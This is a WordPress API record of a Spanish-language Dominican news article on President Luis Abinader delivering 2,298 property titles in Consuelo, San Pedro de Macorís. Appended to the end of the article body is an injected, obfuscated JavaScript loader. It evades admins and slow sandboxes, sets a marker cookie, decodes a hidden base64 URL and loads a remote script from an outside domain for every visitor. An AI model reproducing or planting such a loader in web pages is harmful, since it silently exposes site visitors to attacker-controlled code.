{"id":13388,"date":"2023-01-17T07:39:56","date_gmt":"2023-01-17T11:39:56","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13388"},"modified":"2023-01-17T07:39:56","modified_gmt":"2023-01-17T11:39:56","slug":"presidente-luis-abinader-entrega-2298-certificados-de-titulo-en-consuelo-san-pedro-de-macoris","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13388","title":{"rendered":"Presidente Luis Abinader entrega 2,298 certificados de t\u00edtulo en Consuelo, San Pedro de Macor\u00eds"},"content":{"rendered":"<p>San Pedro de Macor\u00eds.- A dos meses de haber realizado la primera entrega de t\u00edtulos en el municipio de Consuelo,\u00a0<strong>el Presidente Luis Abinader regres\u00f3 para entregar otros 2,298 certificados<\/strong>\u00a0que suman 4,929 t\u00edtulos entregados en la comunidad, de un total de 8,627.<\/p>\n<p>El mandatario recalc\u00f3 que esta pol\u00edtica fomenta el valor de la propiedad de las personas y agradeci\u00f3 a la\u00a0<strong>Comisi\u00f3n Permanente de Titulaci\u00f3n de Terrenos del Estado<\/strong>\u00a0y a las instituciones que la componen, por llevar respuesta a miles de familias en todo el pa\u00eds\u00a0<em>\u201cque merec\u00edan desde hace tiempo contar con sus t\u00edtulos de propiedad\u201d.<\/em><\/p>\n<p>Adem\u00e1s de\u00a0<strong>aumentar el valor de los inmuebles y facilitar el acceso de las familias al cr\u00e9dito formal<\/strong>, este acto representa un ahorro de 183,840,000 pesos, para los nuevos propietarios.<\/p>\n<p><strong>El director de la Unidad T\u00e9cnica Ejecutora de Titulaci\u00f3n de Terrenos del Estado (UTECT), M\u00e9rido Torres<\/strong>, record\u00f3 que en este 2023\u00a0<strong>se entregar\u00e1 una cantidad de t\u00edtulos sin precedentes,<\/strong>\u00a0resaltando unos\u00a0<strong>4,256 en el casco urbano de San Pedro<\/strong>\u00a0y que en esta misma semana se iniciar\u00e1n los trabajos de titulaci\u00f3n del municipio de Quisqueya y el sector La Ure\u00f1a, Santo Domingo Este.<\/p>\n<p>Los sectores beneficiados son Los Jardines, Libertad, Los Vecinos, Pueblo Nuevo, Hato Mayor, Central, Urbanizaci\u00f3n Sue\u00f1o Real, Urbanizaci\u00f3n Maestro Li, Enriquillo, La Loma, El Quilombo, La Gallera, La Guamita, La Habana, Villa Verde, Guachupita, Las Palmas, Santa Ana, La Mina, La Carretera, Batey Experimental, Puerto Pr\u00edncipe, El INVI, Los Qu\u00edmicos, Habitacional Consuelo, La Aviaci\u00f3n, El Cachipero, Batey Don Juan y Puerto Rico.<\/p>\n<p>Los\u00a0<strong>terrenos fueron donados\u00a0<\/strong>por el Consejo Estatal del Az\u00facar, CEA.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/TitulaciC3B3n20SPM120.jpg\" alt=\"\" width=\"1170\" height=\"780\" data-entity-type=\"file\" data-entity-uuid=\"07553e2e-8d42-44cd-9853-f3d93beabeba\" \/><\/p>\n<p><strong>Otras soluciones a problem\u00e1ticas<\/strong><\/p>\n<p>El jefe de Estado tambi\u00e9n se\u00f1al\u00f3 que adem\u00e1s de la titulaci\u00f3n de Consuelo,\u00a0<strong>se est\u00e1 trabajando para culminar el acueducto<\/strong>\u00a0en este 2023, as\u00ed como programas de\u00a0<strong>asfaltado, terminaci\u00f3n de escuelas y liceos.\u00a0<\/strong>Tambi\u00e9n se entregar\u00e1 un m\u00ednimo de 40 millones de pesos para terminar\u00a0<strong>la Casa de la Cultura y se construir\u00e1 un Comedor Econ\u00f3mico.<\/strong><\/p>\n<p>Estuvieron presentes, el Ministro Administrativo de la Presidencia, Jos\u00e9 Ignacio Paliza; el de Agricultura, Limber Cruz; de la Mujer, Mayra Jim\u00e9nez; la gobernadora Aracelis Villanueva; el presidente de INDOTEL, Nelson Arroyo; el alcalde municipal de Consuelo, Juan Padilla; las diputadas Carolina Paula y Lila Alburquerque; el director de Catastro, H\u00e9ctor P\u00e9rez Mirambeaux, y el del IAD, Francisco Guillermo Garc\u00eda.<\/p>\n<p>Participaron tambi\u00e9n el subdirector de la UTECT, Rub\u00e9n C\u00e9spedes, y el superintendente de Sisalril, Jes\u00fas Feris Iglesias, entre otros funcionarios e invitados.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>San Pedro de Macor\u00eds.- A dos meses de haber realizado la primera entrega de t\u00edtulos en el municipio de Consuelo,\u00a0el Presidente Luis Abinader regres\u00f3 para entregar otros 2,298 certificados\u00a0que suman 4,929 t\u00edtulos entregados en la comunidad, de un total de 8,627. El mandatario recalc\u00f3 que esta pol\u00edtica fomenta el valor de la propiedad de las [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13390,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13388","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13388"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13388\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13390"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}